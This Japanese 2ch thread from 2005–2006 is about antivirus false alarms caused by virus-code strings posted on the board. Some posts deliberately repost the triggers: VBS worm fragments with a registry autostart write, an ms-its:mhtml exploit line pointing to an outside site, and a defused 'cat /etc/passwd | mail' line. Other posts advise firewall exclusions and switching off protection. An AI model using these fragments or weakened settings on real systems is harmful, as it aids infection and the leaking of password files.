05/11/18 00:43:33
>>337
ご意見ありがとうです。
VBS.Freelink.Bですが、パターンは1つですが対応はしていますよ。
対応していないパターンかもしれないので、もしよかったら誤反応した
スレを教えて頂けないでしょうか。
そうですね。日付とバージョンはまた書いときますです。
344:ひよこ名無しさん
05/11/20 16:39:13
ほう
345:ひよこ名無しさん
05/11/20 21:02:09
>>343
Winny一般コミック part144
スレリンク(download板:5番)
上記のレスです。
dat落ちしてますので、以下を参照してください。
URLリンク(makimo.to)
346:cen ◆Pm9xOTJuM.
05/11/20 22:07:13
>>345
見てみました。そこの>>5からdatファイルを作って試しましたが、
無効化して、ウイルス対策ソフトでスキャンしても反応しませんでした
よ。
あと、このソフトで対応しているのは、2chにあるdatファイルのみです。
例:URLリンク(pc7.2ch.net)
壺のdatやhtmlには対応していないです。
347:cen ◆Pm9xOTJuM.
05/11/22 02:12:37
>>17 のソフトの紹介ページを更新しましたです。
URLリンク(www.geocities.jp)
348:ひよこ名無しさん
05/11/25 13:41:31 73+tCVDU
ウィルスが検出されんだけどどうすりゃいいの?
349:ひよこ名無しさん
05/11/25 14:39:57
恐れず全力で戦え
350:ひよこ名無しさん
05/11/25 17:03:37
保守
351:ひよこ名無しさん
05/11/28 08:08:31
スレリンク(handygame板)
このスレを読み込もうとすると、ノートン先生が
206.223.150.115からのアタックを検出して
途中までしか読み込めなくなります。
手動スキャンとAuto-Protectでlogフォルダの
除外の設定はしたんだけどまだダメっぽい。
OSはWinXP, ノートン先生はNAV2003, 専ブラはLive2chです。
たっけてー。
352:ひよこ名無しさん
05/11/28 08:36:32
<body onload=window()>
353:ひよこ名無しさん
05/11/28 08:42:51
>>351
NAVですか? インターネットセキュリティじゃなくて?
スレみたら、Nortonスレで昨日話題になったonloadなんちゃらのトラップを確認しました。
これはフォルダの除外設定では対応できなかったと思います。
NIS使ってるなら、NISを無効にして再取得を。
>>352
あーバカが貼りやがったよorz
354:ひよこ名無しさん
05/11/28 08:54:07
>>353
あ、NISでした。勘違いsorry。
無効→再取得してトラップっぽいレス(>>499と>>543)
2個あぼ~んにしました。
これだけで問題ないですか?
355:ひよこ名無しさん
05/11/28 09:01:10
>>354
あぼーんの意味はありません。一度取得すれば問題ありません。
ただし、新規に貼られたら、NGワードに指定してあぼーん(または透明あぼーん)しても引っかかります。
現状での対処法としては
○引っかかったときにNISを切って再取得をする対処療法
○侵入検知の設定で、AutoBlockの除外項目に2chの鯖を登録する(穴をあけることになるので微妙ですが)
くらいでしょうか。
Jane系なら、問題の文字列を別の文字列に置き換えればおk、という案もNortonスレで出てましたが
Live2chでそれをやるのはちょっと手間なようです。
Live2chのスレでも少し話題になってますので、そちらも追っておくことをお勧めします。
356:ひよこ名無しさん
05/11/28 10:58:13
>>355
ご丁寧にどうもありがとうございます。
一度取得してしまえばそれでオワリなんですね。
Live2chのスレ探して見てみます。
357:ひよこ名無しさん
05/11/28 14:10:20
>>355
>Jane系なら、問題の文字列を別の文字列に置き換えればおk、という案もNortonスレで出てましたが
誘導もしくは詳しくお願いします。
358:ひよこ名無しさん
05/11/28 14:42:24
>>357
<ここ数日2chを騒がせている侵入検知トラップの対策法>
症状:
Norton Internet Securityを使用している人で、特定の文字列を書かれると侵入検知が多発し
最短30分間そのアドレスがNISにより規制されるためログが読めなくなる。
対策:上に行くほどおすすめ
①Jane系の専用ブラウザ使ってる場合
JaneフォルダにReplaceStr.txtというテキストファイルを作り
onload=[Tab]onload=
みたいに置き換えればOK(↑の”[Tab]”はタブ入力)
Tabキーを押すのを忘れて[Tab]onloadとそのまま書いてはダメ
②Replace法が使えない場合(他の専用ブラウザ、IEなど)
Nortonの統計ログの侵入検知の項目を見て、ブロックされているサーバ名を確認(例:tmp5.2ch.net)
侵入検知の設定で除外に上で確認したサーバ名を入れる
ただしこの方法は穴を作ることになるのであまりおすすめではない
③よくわかんね、って人
読み書きするときに「Norton Internet Securityを無効にする」を選んで一時的にNISを切る。
このときAuto-Protectを切っても無意味なので注意。Auto-ProtectはAntivirusなので。
ガセビアの沼
・Love-letterと同じVB使った疑似ウイルスだからNAVの除外設定に専用ブラウザのログフォルダを入れてやればいい、というのはガセ
今回のはNAVではなくNIS管轄のトラップです
Nortonスレはこちら。
ただし、問題の起こる文字列が貼られているので、読み込むときには上記対策のいずれかを行ってください。
【ノートン】インターネットセキュリティ Ver.77【2006】
スレリンク(sec板)
359:ひよこ名無しさん
05/11/28 14:57:54
(笑)
360:ひよこ名無しさん
05/11/28 17:12:55
URLリンク(www.computerterrorism.com)
URLリンク(www.computerterrorism.com)
URLリンク(www.computerterrorism.com)
361:ひよこ名無しさん
05/11/28 17:30:40
>>358
それガセらしいじゃないか・・・
。゚(゚´Д`゚)゜。ウァァァン
362:ひよこ名無しさん
05/11/28 17:33:17
>>361
あーはいはい。
1. [ファイアウォール]をダブルクリック
2. [ネットワーク]をクリック
3. [信頼]をクリック
4. [追加]をクリック
5. [範囲を使う]をチェック
6. 開始アドレスに「206.223.147.0」を入力、終了アドレスに「206.223.154.255」してOKをクリック
363:eip = eip + unescape("%u7030%u4300")
05/11/28 19:44:46
URLリンク(www.computerterrorism.com)
URLリンク(www.computerterrorism.com)
URLリンク(www.computerterrorism.com)
364:ひよこ名無しさん
05/11/28 20:55:42
ms-its:mhtml:file://c:\
365:名無しさん@お腹いぱーい。
05/11/29 00:32:03 BE:2515744-##
とりあえずKnowledge Base 経由で>>352のソースをツマンテックに送って対応を催促しますた。
366:ひよこ名無しさん
05/11/29 00:54:38
馬鹿だなノートン。
367:ひよこ名無しさん
05/11/29 10:34:17
ノートンの誤作動対策したら、
スクリプトを仕組んでるスレみると、変に改行されてしまう(\r\n\r\n)のはなぜ?
368:名無しさん@お腹いぱーい。
05/11/29 12:44:31 BE:1415333-##
>>367
>>362の設定ですか?
2ちゃんねるブラウザでの不具合は
お使いの2ちゃんねるブラウザのスレで環境を詳しく書いてお聞きください。
369:cen ◆Pm9xOTJuM.
05/11/30 00:10:23
>>352について、役に立つかは知らないですが、>>17のソフトにて
対応させてみました。
URLリンク(www.geocities.jp)
370:ひよこ名無しさん
05/12/11 18:48:05 J4cBBOMR
【アメリカ】全米各地で中国系中心に「アジア人」生徒へのいじめが増加…問題の根深く
スレリンク(newsplus板)
371:名無しさん@お腹いぱーい。
05/12/12 00:37:26 BE:1257942-##
現在、2ちゃんねるではNIS(NPF)のファイアーウォールを誤作動させるコードの書き込みが出回っています。
アンチウイルス(NAV)は反応しないのでファイアーウォールの設定を見直さなければなりませんがあくまで暫定的処置です。
2chNIS問題まとめページ
URLリンク(mickey.mirv.net)
ノートン応急対策
URLリンク(info.2ch.net)
URLリンク(ansitu.xrea.jp) URLリンク(ansitu.xrea.jp)
URLリンク(wiki.livedoor.jp)
この場合2ちゃんねるに対してファイアーウォールの機能は働きません。
また、同様なコードが2ちゃんねるではない外部板に貼られていても上記ページのような設定はお勧めしません。
シマンテックの対応待ちです。
アンチウイルス(NAV)の設定は>>1
URLリンク(ansitu.xrea.jp)
372:ひよこ名無しさん
05/12/12 23:03:17 TJ/QcL4e
<body onload=windowあ()> ms-its:mhtml:fileあ://c:\
↑ひらがな抜いて書き込みすると誤作動します。
誤作動うざい。
373:ひよこ名無しさん
05/12/12 23:14:43
doredore,
<body onload=window()> ms-its:mhtml:file://c:\
374:ひよこ名無しさん
05/12/13 00:32:45
i|!| |i┏┓! i!┏┳┓| |||i|!i| ||!i|| |||ii| ||| ||| |i||!|i│i!┏┓i!|
|i|┏┛┗━╋┻┛|i!||!|ii|| i|!i||i|┏━┓ ┏┓i|i| i┃┃i!|
i||┗┓┏┓┃||i┏━━┓┗━┛ ┃┃|i||!i┃┃i!|
|i |!|i┃┃┃┃i||┗━━┛|i|| || ||||!┃┃i|i| i┗┛!i|
i||i ||┃┃┃┃|! |||i ||i !|||!|┏━┛┃|i||!i┏┓i|!
|i!i |!┗┛┗┛i|!i| / | / | ┗━━┛i|i| i┗┛i!|
i| |||i|!i| ||!|i||i! /,_ ┴─/ ヽ |!i| ||| |i||!|i|i|||| ||i
|i|| ||i!i|| (_゜.,》.'(_゜,》)ミ ヽ ! | |!i||!|ii||!|ii|
i|ii / ,,__,ニ、、 ノ( | i|i!|i|
|i | Y~~/~y} `, ~ | そ、そんなー… |i
!. | ,k.,.,!,.,.,r| ,! く .!
i / <ニニニ'ノ \ l
375:ひよこ名無しさん
05/12/14 08:34:01 9z0oGE5T BE:229219294-#
てt
376:ひよこ名無しさん
05/12/16 07:08:09
vicptdelで処理した後、久々にNAVでJaneのlogをスキャンしてみたら、
以下のレスがvicptdelで処理されていなかったらしく、NAVに削除されました。
スレリンク(download板:11番)
URLリンク(makimo.to)
cenさんもしよろしければ、対応お願いします。
またスレタイがウィルスコードだったのか分かりませんが、subject.txtに
以下のUnix Penguinが入っていましたが、datだけでなく、
vicptdelでsubject.txt等も対応できないでしょうか?
caXt /etc/paXsswd | mail noXbody (Xを削除)
377:cen ◆Pm9xOTJuM.
05/12/18 00:49:25
>>376
そのスレの11ですが、そのパターンは対応していますよ。
手で11のdatを作って、スキャンしたら無効化されました。
デフォルトだとスキャンする時から10日前以降に更新されたdat
ファイルのみスキャンする設定なので、すべてのdatファイルを
スキャンする設定でしてみてください。
あと、subject.txtは専用ブラウザで板を見るときに常に更新するもの
だと思いますので、無効化しても効果がないので、スキャンはしない
です。
378:ひよこ名無しさん
05/12/22 17:14:31 Y2IitcnV
ノートンインターネット2006を入れたのですが、初心者の質問の板が
見れたり見れなかったりします。見れてもウィルス反応がでてしまう
のですが、2006の設定を教えて下さい。
お願いします。
379:ひよこ名無しさん
05/12/22 17:23:38
>>378
ノートンを切る
それだけ
380:ひよこ名無しさん
05/12/22 19:21:21 Z1b4rF6D
NIS2006を入れたんですが、誤反応しません。
設定が悪くセキュリティが甘くなってるのでしょうか?
381:ひよこ名無しさん
05/12/22 19:37:59
>>380
割れてます。
382:ひよこ名無しさん
05/12/22 20:22:37
>>381
普通にLiveUpdateとかできるのに…いや、それより何故割れてるって解るんでしょうか?
383:ひよこ名無しさん
05/12/22 20:23:54
>>382
(((((((( ;゚Д゚)))))))ガクガクブルブル
384:ひよこ名無しさん
05/12/23 00:52:52
.l l \| | !ノートン先生 ! //U ヽ___/
パソコン蛾人 \ !!大激怒!! // U :::U:
ぶっ壊れ(__) \ !!!!! / // ___ \ :::
たお! (__) \∧∧∧∧/ | | | U ::::
(`Д´#) < ぶ パ > |U | | ::U:
_| ̄ ̄||_)_ < っ ソ > | ├―-┤ U.....::::
/旦|―||// /| < 壊 コ > ヽ .....:::::::::
─────< れ ン >─────
< _,ノ , 、ヽ、_ ノ< た 蛾> プスプスプス・・・・・∬∬
(y○')`ヽ) ( ´(y○')< !!! >踏んじゃったよぉ___
⌒ / ヽ⌒ /∨∨∨∨\ ∧_∧ ||\
うわあ |~ ̄ ̄~.|ぁぁ/パソコン蛾ぶ \ ( ;´Д`) || |
ぁぁ| |||! i: |||! !|ぁ/っ壊れた!ディス \( つ/ ̄||/
ぁぁ| |||| !! !!||| :|/プレイが砕け散った! \ヽ |二二二」
385:ひよこ名無しさん
05/12/26 23:44:59 JAAmlww2
スレリンク(kankon板)
このスレにアクセスしたらウイルスが検出されます。
どうしたらいいですか?
386:ひよこ名無しさん
05/12/26 23:46:05
>>385
このスレを一通り読んでから質問しろよ情報乞食
387:ひよこ名無しさん
05/12/26 23:48:53
>>385
何でそうやってすぐに聞こうとするの?
まともな日本語能力と社会的常識を持っていれば
ちょっと調べれば、ちょっと読めば解決するのに
388:ひよこ名無しさん
05/12/26 23:54:34 TT8kYPqv
URLリンク(210.150.222.13)
の掲示板に貼られている空白?の画像はスパイウェアー
だと他の利用者が知らせてくれたのですが、
もしかしたらクリックしてしまったたかもしれません
スパイウェアーというのは感染するとどうなってしまうのでしょうか?
怖いので今日中に再フォーマットするつもりですが・・・
389:ひよこ名無しさん
05/12/26 23:58:53
>>388
で、何故このスレで聞こうと思ったの?
390:ひよこ名無しさん
05/12/26 23:59:45
自称PC初心者はスレタイも読めない日本語初心者…っと。
391:ひよこ名無しさん
05/12/27 00:04:42 TZFt/HNg
>>389
あ、今、別のスレで教えてもらえました
すいませんm(__)m
392:ひよこ名無しさん
05/12/27 01:32:52
>>388
踏んだ 踏んだ どうにもならへん
内部で呼び出しているサーバーがお休みのようだ
マカフィーさんも無反応
XP_SP2にとってはブラクラ以外の何物にもならない
393:ひよこ名無しさん
06/01/05 11:05:53
じいさんのためにage
394:ひよこ名無しさん
06/01/09 23:41:35
バージョン 】 1.12
【 スキン 】 default
【 IE 】 6.0.2900.2180
【 Windows 】 Windows XP Home Edition (Service Pack 2)
【 不具合 】 生活板がどのスレッドも見れません。
【詳しい内容 】 ボードデータの更新をしても、スレッドの更新をしても、再インストールしても
見れません。ちなみに専用ブラウザを使用しなくても見れなくなってしまいました。
何が原因なのでしょうか…?
395:ひよこ名無しさん
06/01/10 21:00:00
>>394
ここに来たってことはノートン入れてるんでしょ?
原因はノートン
ついでに保守age
396:ひよこ名無しさん
06/01/11 08:57:15
ms-its:mhtml:file://c:\
397:ひよこ名無しさん
06/01/15 20:20:52
定期age
398:ひよこ名無しさん
06/01/22 05:06:59
すみません。色々やったけどギブですorz質問よろしいでしょうか…
■janeDoeα 0.1.12.2■xp■NIS2004■>>1-9は読みました
>>51>>56さんとややケースが似てるんですが…
最近ノートン2004を再インスコしたので、前と同じ方法(>>1)で
また専ブラのlogフォルダを除外設定しました、が、何故か今度はどう設定やり直しても
下記のスレで先生に怒られます。
スレリンク(pcqa板)(このスレです…)
スレリンク(hp板)
警告メッセージのスクショ↓
URLリンク(vipquality.orz.hm)(このスレのです。これが2回でます)
URLリンク(vipquality.orz.hm)(下のスレのです)
で、何度設定しても駄目だったのでこのソフトを入れて、トラップの無効化を試みたんですけど
URLリンク(www.geocities.jp)
やっぱり上記のスレで先生に怒られます。何回かこのソフト起動させてみたんですが
無効化成功してるよ。みたいなメッセージが出るだけで、依然として先生は怒りまくりだし
もうどうしていいか分かりません。誰か助けて~(つД`;)
399:ひよこ名無しさん
06/01/22 05:20:54 qJbbwLqx
トラックバック:スレリンク(qa板)
400:ぼるじょあ ◆yBEncckFOU
06/01/22 05:37:48
>>398
(・3・) エェー そのソフトはdatは対策できるけど、subject.txtは
対策できないYO
401:名無しさん@お腹いぱーい。
06/01/22 19:21:57
>>398
今一度、Norton Anti Virusのオプションで
手動スキャンとAuto-Protectでlogフォルダの除外の指定をしているか確認してください。
該当スレに書き込んだ・該当スレをお気に入りに入れた・ウイルスコードを検索したりすると
幾つか除外の指定を増やすことになるのでご注意ください。
Janeの場合
Jane2ch\Logs
Jane2ch\favorites.dat
Jane2ch\kakikomi.txt
Jane2ch\SearchHistory.txt
ε三(; ・∀・)鯖マデオツカイの場合
otsukai\result.dat
詳しくはお使いの2ちゃんねるブラウザのスレのテンプレや
2ちゃんねるブラウザのヘルプ
2ちゃんねるブラウザ配布サイト等のFAQなどを参照してください。
402:名無しさん@お腹いぱーい。
06/01/22 19:46:59
>>401補足
増えた項目の内、
Jane2ch\favorites.dat
Jane2ch\kakikomi.txt
otsukai\result.dat
↑はスレタイに反応した場合です。
403:ひよこ名無しさん
06/01/27 17:56:55 SL6Rf0+0
Live2chのフォルダごとNorton Anti Virus→除外に設定しても良いの?
404:ひよこ名無しさん
06/01/28 02:19:43 W65BflbM
すみません、質問です。
昨日から携帯PHS板を見ていると、ノートンで何度も警告が出て、
WScript.KakWormってやつなんですけど、これは
「kak.hta';ken=wd+'START」ってスレタイがあるせいなのでしょうか?
405:404
06/01/28 02:27:13
すみません、テンプレ見ましたm(_ _)m
406:名無しさん@お腹いぱーい。
06/01/28 20:16:04
>>403
Logフォルダを除外に指定してね。
407:ひよこ名無しさん
06/01/31 10:00:47 nkcqfLth
先程、他のスレッド見ていたら、ノートンの低危険度の表示が出てきて遮断をクリックしたら、あらゆるホームページが見れなくなりました。原因解るかた教えてください。宜しくお願いします。m(__)m
408:ひよこ名無しさん
06/01/31 10:02:30
>>407
誘導されたらそう書け
それと普通>>1から読むもんだ
既知の質問を延々と繰り返し答えさせられるこっちの身にもなれ
409:ひよこ名無しさん
06/01/31 10:03:47
これかな?
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!URLリンク(www.loadcash.biz)" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
End Sub
<body onload=window()>
410:ひよこ名無しさん
06/01/31 10:08:09 nkcqfLth
>>408
はぁ?おめーから何も答えてもらってねーぞ。
解らねーんだったらいちいち出てくんじゃねぇよアフォ
411:ひよこ名無しさん
06/01/31 10:10:37
言っておくけど、回答者はどこも共通だから
412:ひよこ名無しさん
06/01/31 10:11:13
i|!| |i┏┓! i!┏┳┓| |||i|!i| ||!i|| |||ii| ||| ||| |i||!|i│i!┏┓i!|
|i|┏┛┗━╋┻┛|i!||!|ii|| i|!i||i|┏━┓ ┏┓i|i| i┃┃i!|
i||┗┓┏┓┃||i┏━━┓┗━┛ ┃┃|i||!i┃┃i!|
|i |!|i┃┃┃┃i||┗━━┛|i|| || ||||!┃┃i|i| i┗┛!i|
i||i ||┃┃┃┃|! |||i ||i !|||!|┏━┛┃|i||!i┏┓i|!
|i!i |!┗┛┗┛i|!i| / | / | ┗━━┛i|i| i┗┛i!|
i| |||i|!i| ||!|i||i! /,_ ┴─/ ヽ |!i| ||| |i||!|i|i|||| ||i
|i|| ||i!i|| (_゜.,》.'(_゜,》)ミ ヽ ! | |!i||!|ii||!|ii|
i|ii / ,,__,ニ、、 ノ( | i|i!|i|
|i | Y~~/~y} `, ~ | そ、そんなー… |i
!. | ,k.,.,!,.,.,r| ,! く .!
i / <ニニニ'ノ \ l
413:ひよこ名無しさん
06/01/31 10:12:28
>>410
お前が礼言ってたコテな、テンプレに注意書きがあるくらいの要注意人物なんだよ
414:ひよこ名無しさん
06/01/31 10:16:03
>>410
URLリンク(ansitu.xrea.jp)
ここを読んでください
415:ひよこ名無しさん
06/01/31 10:16:50
>>410
この部分ね
2005年11月28日現在、2ちゃんねるではNIS(NPF)のファイアーウォールを誤作動させる
コードの書き込みが出回っています。
アンチウイルス(NAV)は反応しないのでファイアーウォールの
設定を見直さなければなりませんがあくまで暫定的処置です。
NIS2005の場合(多分NIS2006も同じ)
416:ひよこ名無しさん
06/01/31 10:16:58 nkcqfLth
>>411
解りました。m(__)mではどこで聞いても答えは一緒って事ですね。お手数おかけしました。また何かありましたら宜しくお願いします。
417:VIP@命 ◆VIPPER/vT.
06/01/31 10:31:48 nkcqfLth
あっ。ちなみにぼくは、愛新ではありません。
あしからず
418:ひよこ名無しさん
06/02/01 13:48:25 S10H/e1R
時々ノートンインターネットセキュリティ2004を使用している際、
スレ、もしくは板そのものがサーバーに接続できなくて見ることができません。
アンチウィルスは常時つけていますが、切ってもつけていても見ることができるのですが
この症状はアンチウィルスが反応している訳ではありません
インターネットセキュリティをつけているときだけ見ることができないのですが
なぜなんでしょうか?
もちろんインターネットセキュリティの2CHに書き込める為の設定をしてあります。
これはなぜなんでしょうか?
419:ひよこ名無しさん
06/02/01 13:55:37
>>418
>>371の問題でもないってことでしょうか。
371の暫定対処をした場合はどうなりますか?
420:418
06/02/01 14:05:32 S10H/e1R
>>419
ありがとうごぜーます。
呼んできます。
421:ひよこ名無しさん
06/02/02 16:52:23 KtbG8KDn
■>>1-9を読みましたか? 『YES』
マカフィーを使っているのですがdatファイルの入ったzipファイルを解凍しようと
すると「Exploit-mhtresir.gen」が発見されたので削除しますと言われzipファイルの中のdatを
他の場所に保存することもdatファイルを使うことも出来ないのですがどうすれば
zipファイルを解凍して中のdatファイルを使えるようになりますか?
OSはXP
アンチウイルスソフトはManaged virusScan plas AntiSpywareです。
お願いします。
422:ひよこ名無しさん
06/02/02 17:55:04 KtbG8KDn
他できいてみます。
423:名無しさん@お腹いぱーい。
06/02/02 23:44:24 BE:7074195-
>>421-422
> マカフィーを使っている
> datファイルの入ったzipファイル
2ちゃんねるブラウザのログファイルでは無い場合はこちらのスレでは扱っていません。
このスレでは「ノートントラップ」は2ちゃんねる(掲示板)にウイルスコードが貼り付けられ
Webブラウザや2ちゃんねるブラウザのログでノートンが誤反応することを指しています。
スレリンク(pcqa板:441番)
そのzipファイルがアップローダーで拾ったものならマカフィーは正常な反応を示しているかと思います。
念のためにオンラインスキャンしてみてください。
URLリンク(www.trendmicro.co.jp)
マカフィーについて以降はより詳しいあなたの環境(zipファイルの出所・何のアプリケーションに使われているのか等)を書いて
以下のスレにここから誘導されたことも併記してお尋ねください。
がんばれマカフィー Part.23 / ガンバレMcAfee
スレリンク(sec板)
もしマカフィーが2ちゃんねるブラウザのログで反応しているのならお手数ですがもう一度こちらに来てください。
424:ひよこ名無しさん
06/02/03 09:31:43 ZZST2Rw7
>>423
ご丁寧に解答を頂きありがとうございます。
datファイルの入ったzipファイルはある2ちゃんねるのスレのまとめサイト
からダウンロードしたファイルです。
オンラインスキャンでは何も見つからなかったです。
>もしマカフィーが2ちゃんねるブラウザのログで反応しているのなら
>お手数ですがもう一度こちらに来てください
datファイルは2ちゃんねるのスレッドのdatファイルなのですが
こちらでよろしいでしょうか?お願いします。
425:421
06/02/03 10:12:08 ZZST2Rw7
すいません>>421の者です。
426:名無しさん@お腹いぱーい。
06/02/03 13:48:07 BE:7545986-
>>424-425
おそらくそれはウイルスコードにマカフィーが誤反応しているものだと思われます。
他で教えていただいたのですがマカフィーにはノートンのようなウイルススキャンでフォルダ・ファイルの除外項目が無いそうです。
以下、現在の状況での対処方法です。
2ちゃんねるブラウザのJane派生のJaneViewでWickedStr.txtに手動で反応する文字列の一部を追記する。
誤反応スクリプト無効化ソフトURLリンク(www.geocities.jp)のアップデートを待って(現在マカフィートラップには対応していません)
ActiveShieldを無効→対象スレを取得→「誤反応スクリプト無効化ソフト」を使ってウイルスコードを無効→ActiveShield有効
2ちゃんねるブラウザMonoViewのアップデートを待って(現在マカフィートラップには対応していません)読み込む。
一番いい方法はマカフィーに該当するdatファイルを送って対策を促すことだと思います。
マカフィーユーザーで既に対処の仕方を知っている方がいらっしゃるのかもしれませんので
>>423のマカフィーのスレでこちらのことを聞いてみていただけませんでしょうか。
対処方法がありましたらこちらのスレにもお知らせいただけると幸いです。
また参考のためにも今後もこちらに来ていただけると助かります。
ノートントラップとマカフィートラップのウイルスコードは違うようなので
ノートンでは反応しないでマカフィーが誤反応したりまたその逆もあります。
長々としましたがマカフィートラップについての決定打が見当たらないので手探りのレスを御許しください。
参考にマカフィートラップと思われるやり取りの過去ログです。
スレリンク(sec板:72-77番)+553-555+558-559+563
URLリンク(makimo.to:8000)
スレリンク(saku板:62-65番)n
URLリンク(jbbs.livedoor.jp)
427:421
06/02/03 14:40:06 ZZST2Rw7
>>426
わかりやすく説明していただき、
関連スレまで貼っていただいてありがとうございます。
ただ解決まではいけなかったので>>423の方で聞かせて頂きます。
何かわかりましたらこちらにも報告させて頂きますね。
ありがとうございました。
428:ひよこ名無しさん
06/02/06 19:42:50
なんかjaneでこのスレ読むとレス番がずれまくりなんですけど
これ直す方法はないんでしょうか…?何度再読み込みしても
421さんが406さんになっちゃいます…↓
> 406 名前:421[] 投稿日:2006/02/03(金) 14:40:06 ID:ZZST2Rw7
logフォルダの除外設定はしてあるので、先生も怒ってないんですが…
ノートン2004でxp。専ブラはjaneDoeView α051128です
429:ひよこ名無しさん
06/02/07 00:57:31 3ZNXNyQs
XPに最初から入ってるノートンをアンインスコしたらもう再インスコって出来ませんかね??
430:名無しさん@お腹いぱーい。
06/02/07 01:18:43 BE:5659294-
>>428
一旦ログを破棄してから読み込みでどうですか。
それと>>371にもありますがNIS(NPF)のファイアーウォールを誤作動させるコードもあるので
以下の設定もしてみてください。
現在、2ちゃんねるではNIS(NPF)のファイアーウォールを誤作動させるコードの書き込みが出回っています。
アンチウイルス(NAV)は反応しないのでファイアーウォールの設定を見直さなければなりませんがあくまで暫定的処置です。
2chNIS問題まとめページ
URLリンク(mickey.mirv.net)
ノートン応急対策
URLリンク(info.2ch.net)
URLリンク(ansitu.xrea.jp) URLリンク(ansitu.xrea.jp)
URLリンク(wiki.livedoor.jp)
この場合2ちゃんねるに対してファイアーウォールの機能は働きません。
また、同様なコードが2ちゃんねるではない外部板に貼られていても上記ページのような設定はお勧めしません。
シマンテックの対応待ちです。
アンチウイルス(NAV)の設定は>>1
URLリンク(ansitu.xrea.jp)
431:428
06/02/07 06:33:12
>>430
丁寧なレスありがとうございました。火壁の設定してログ捨ててみたら
ズレてるの直りました!感謝です!
432:421
06/02/07 09:35:42 mnvRCCNZ
以前こちらで質問させて頂いて誘導された者です。
解決方法がわかりましたのでその報告をさせて頂きます。
結論からいうとマカフィーが起動している時にzipファイルの中からdatファイルを
出す方法はありませんでした。
ただマカフィーの自動スキャンを一時的に止めてその間にzipファイルの中の
datファイルを取り出すことができました。
一時的に自動スキャンを止める方法は(以下コピペ)
URLリンク(www.mcafee.com)
>また、管理者権限でコンピュータにログオンし、[Ctrl]キーと[Shift]キーを押しながら
>タスクトレイのアイコンを右クリックすると、更に隠しメニューが表示されます。
>この隠しメニューから通常のメニューに加えて以下の操作を行うことができます。
>・隔離アイテムの一覧
>・VShieldを無効にする/VShieldを有効にする
>・終了
とのことでした。実際に試したところ成功いたしました。
またvbsウイルスソースが多々隔離されており消したところかなり早くなりました。
丁寧に教えてくれた皆さん、ありがとうございました。
433:ひよこ名無しさん
06/02/08 17:28:05
>>430
>この場合2ちゃんねるに対してファイアーウォールの機能は働きません。
ということですが、それはセキュリティ的には問題ないレベルなんですか?
あと↓によると
2chNIS問題まとめページ
URLリンク(mickey.mirv.net)
>以下の対処方法では除外するIPアドレスの範囲からの攻撃に対してNISは反応しなくなります。
とありますが、2ちゃん以外の場所で除外したIPアドレスを利用した
悪意ある攻撃があった場合は大丈夫なんでしょうか?
それとも除外したIPアドレスは2ちゃん以外では使われてないのでしょうか?
分かる方いらっしゃったらご教授お願いします
434:名無しさん@お腹いぱーい。
06/02/08 22:45:25 BE:6288858-
>>432
お知らせありがとうございます。
マカフィーについての解説を参照できますので助かりました。
>>433
> 2ちゃん以外の場所で除外したIPアドレスを利用した
> 悪意ある攻撃があった場合は大丈夫なんでしょうか?
2ちゃんねる以外のIPアドレスを除外することはここではお勧めしません。
また、2ちゃんねるからの攻撃・進入等はいままではありませんでした。
過去には踏み台pcを規制するための2ちゃんねるからのインバウンド TCP 接続信号を受け入れなければいけなかったこともあります。
URLリンク(pc.2ch.net) の7
只、何事も絶対安全ということはないのでセキュ板本スレを見るようにしてください。
なにかあったら祭りになりますので。
【ノートン】インターネットセキュリティ Ver.82【2006】
スレリンク(sec板)
> それとも除外したIPアドレスは2ちゃん以外では使われてないのでしょうか?
おそらくないはずですが、2ちゃんねるのIPアドレスそのものに関しては
以下のスレに誘導されたことを明記してお聞きください。
質問・雑談スレ215@運用情報板
スレリンク(operate板)
関連スレ
ノートン誤作動対策本部
スレリンク(operate板)
435:433
06/02/08 23:50:59
>>434
お答え頂いてありがとうございました
紹介して頂いたスレはお気に入りに登録しました
あと運用情報板に質問して、疑問も解消しました
ありがとうございました
436:ひよこ名無しさん
06/02/18 20:12:50
ここできいていいのかあれだけど、
updateして再起動してからjane開いて更新しようとすると
中危険度の小窓がいちいち表示されるようになった
「jane.exeがインターネットにアクセスしようとしています」
security無効にすると更新できるけど、前は有効のままで更新できてたの・・
解除方法おしえてくださいm(_ _)m
437:ひよこ名無しさん
06/02/18 20:37:00
FWが反応してるだけみたいだね。
アプリ登録するだけじゃないのかな。
まあ、ノートン使ってないんでFWの一般論だけど。
438:ひよこ名無しさん
06/02/24 07:54:27 /hbjD2Uq
2chブラウザのログ保存フォルダを「除外」に設定して、2ちゃんのスレで
ウイルス踏んじゃったらどうなるんですか?ノートンは守ってくれないんですか?
439:ひよこ名無しさん
06/02/24 09:20:24
そんなノートンは窓から捨てろwwwwwwwwwww
440:ひよこ名無しさん
06/02/24 14:13:12
>>438
2chブラウザのログ保存フォルダにウィルスが入り込むことはありません。
ノートンがログ保存フォルダからウィルスを見つけたと言い出しても、スレタイにある通り誤認です。
リンクをクリックして起動したWebブラウザがウィルスのあるページを読み込もうとしたときは
ちゃんと守ってくれます。
441:ひよこ名無しさん
06/02/24 23:01:38
>>438
__
/;;;;;;;;;;;;;\
/;;:::::::::::::::::::::::\
∈=━/,,;;:::::::::::::::::::::::::.;ヽ━=∋
L::;;,__ ..:::ゝ
//;;;;::::::.. ̄ ̄ ̄ ̄..::::;;;ヽ
/ ;;;;;;;;:::::::::::;;;;;;;;;;;;;::::::::;;;;; ヽ
/j/三三三三三三三三三三ヾ、
l::||:::: |l
/ ̄\ ヽ-=・=-′ヽ-=・=-′ ||
r┤ ト::::: \___/ || <信じろ!
/ \_/ ヽ:::. \/ ,ノ
| _( ̄ l―---oo-―'"ヽ__
| _)_ノヽ\ ハ // / ヽ
